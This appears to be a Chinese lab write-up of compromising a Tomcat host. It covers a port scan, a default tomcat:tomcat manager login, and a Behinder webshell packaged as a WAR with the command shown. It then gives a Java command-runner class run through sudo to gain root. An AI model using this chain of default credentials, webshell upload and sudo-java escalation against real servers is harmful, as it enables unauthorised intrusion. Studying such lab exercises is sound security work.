渗透测试之MyTomcat Host

Nmap 进行端口扫描：存在22和8080端口

 

访问8080端口，Tomcat管理界面，尝试弱口令以及幽灵猫ajp漏洞。

（幽灵猫不再版本范围之内）

tomcat:tomcat弱口令：

 

生成冰蝎的war包：jar cvf shell.war .\shell.jsp

直接访问报错500，通过冰蝎成功访问：

启用虚拟命令行，发现java具有sudo权限：（手残把sudoers文件权限改了，再也并不能执行sudo命令了）

之后上传java代码，执行系统命令：

import java.io.BufferedReader;
import java.io.Closeable;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.Arrays;
import java.util.*;
import java.util.StringTokenizer;

public class ProcessUtils {
	private final static String DEFAULT_CHARSET_NAME = "UTF-8";

	public static Result run(String commend) {

		return run(commend, DEFAULT_CHARSET_NAME);
	}


	public static Result run(String commend, String charsetName) {
		StringTokenizer st = new StringTokenizer(commend);
		String[] commendArray = new String[st.countTokens()];
		for (int i = 0; st.hasMoreTokens(); i++) {
			commendArray[i] = st.nextToken();
		}

		return run(Arrays.asList(commendArray), charsetName);
	}


	public static Result run(List commend) {
		return run(commend, DEFAULT_CHARSET_NAME);
	}


	public static Result run(List commend, String charsetName) {
		Result result = new Result();
		InputStream is = null;
		try {
			Process process = new ProcessBuilder(commend).redirectErrorStream(true).start();
			is = process.getInputStream();
			BufferedReader reader = new BufferedReader(new InputStreamReader(is, charsetName));
			StringBuilder data = new StringBuilder();
			String line;
			while ((line = reader.readLine()) != null) {
				data.append(line).append(System.lineSeparator());
				System.out.println("\033[0;35m" + line + "\033[0m");
			}
			result.code = process.waitFor();
			result.data = data.toString().trim();
		} catch (Exception e) {
			throw new RuntimeException(e);
		} finally {
			closeStreamQuietly(is);
		}

		return result;
	}

	private static void closeStreamQuietly(Closeable stream) {
		try {
			if (stream != null) {
				stream.close();
			}
		} catch (IOException e) {
			// ignore
		}
	}

	public static class Result {
	
		public int code;
		
		public String data;
	}


	public static void main(String[] args) {

		Result r = ProcessUtils.run(Arrays.asList(args));
		System.out.println("code:" + r.code + "\ndata:" + r.data);
	}
}

 

在windows编译后上传到服务器：

之后通过sudo运行java执行代码，便可以获得root权限：